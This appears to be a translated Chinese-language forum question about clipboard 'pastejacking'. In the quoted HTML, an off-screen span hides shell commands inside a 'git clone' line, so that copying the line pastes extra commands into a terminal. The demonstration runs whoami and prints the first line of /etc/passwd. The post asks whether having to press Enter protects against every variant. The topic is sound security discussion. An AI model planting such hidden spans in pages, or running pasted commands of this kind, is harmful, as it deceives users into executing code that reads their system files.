上述链接的网站包含以下 HTML 和 CSS:
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<!-- Oh noes, you found it! -->
git clone
<span style="position: absolute; left: -100px; top: -100px">/dev/null; clear; echo -n "Hello ";whoami|tr -d '\n';echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust!<br>Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwd<br>git clone </span>
这呈现为git clone git://git.kernel.org/pub/scm/utils/kup/kup.git
git clone /dev/null; clear; echo -n "Hello ";whoami|tr -d '\n';echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust!
Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwd
git clone git://git.kernel.org/pub/scm/utils/kup/kup.git
git clone /dev/null; clear; echo -n "Hello ";whoami|tr -d '\n';echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust!Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwdgit clone git://git.kernel.org/pub/scm/utils/kup/kup.git
现在,您必须显式按 Enter 才能使代码执行,而将其粘贴到终端中的行为是不够的。这是防止这种攻击的所有变体的安全方法吗?